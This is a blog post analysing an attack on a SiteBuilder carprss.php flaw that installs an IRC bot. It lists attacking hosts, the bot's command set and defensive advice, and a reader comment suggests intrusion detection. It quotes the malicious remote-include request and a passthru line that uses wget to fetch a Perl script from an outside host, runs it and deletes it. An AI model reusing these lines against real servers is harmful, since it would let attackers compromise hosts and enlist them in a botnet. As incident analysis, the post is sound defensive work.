carprss.php Exploit

0wn3d! Since 29 February, this blog has been hit by 400+ attempts to compromise the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromised hosts:

# awk '{ print $1 }' <carprss.tmp  | sort -nu
64.128.80.82
64.185.237.176
64.22.112.178
64.255.254.10
64.69.32.173
65.254.53.145
65.36.169.130
68.76.31.154
72.29.80.167
87.101.4.42
87.106.48.129
87.230.84.213
88.198.141.110
88.61.196.190
140.127.223.39
147.102.106.10
193.188.66.23
202.143.142.163
203.200.217.210
203.204.97.53
207.44.248.81
208.1.62.200
208.69.192.133
211.49.171.159
212.179.41.165
212.241.213.119
213.83.47.82
216.154.215.249
216.191.16.13
217.11.95.5

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
      .shell/site/iyes.txt??

I downloaded the file iyest.txt; it’s a PHP script which contains many lines such as:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
      hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It sets up an IRC bot which tries to connect to 61.246.177.225:65500 and join the channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How can this kind of attack be avoided? First, run patched software! But how can the attacks be contained if they do get through?

  • Do not run public servers with administrative rights (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing connections to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers from executing or accessing unusual files or directories. [1]
  • Run SELinux on Linux or systrace on *BSD.

I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at them “for study only”. If you have more information, let’s share it!

One comment

  1. As an extra precaution, you could also:
    – run some kind of ID(P)S on your system
    – run log analyzers so you can detect the breach. In this case a baseline anomaly analyzer would be great to detect that there is ‘something’ going on.
    Of course, this is more reactive technology but it helps to investigate if all the preventive tech fails. It can also help to detect stuff based on the reports of the IDS/analyzer if they got through the preventive measures.

    Tom
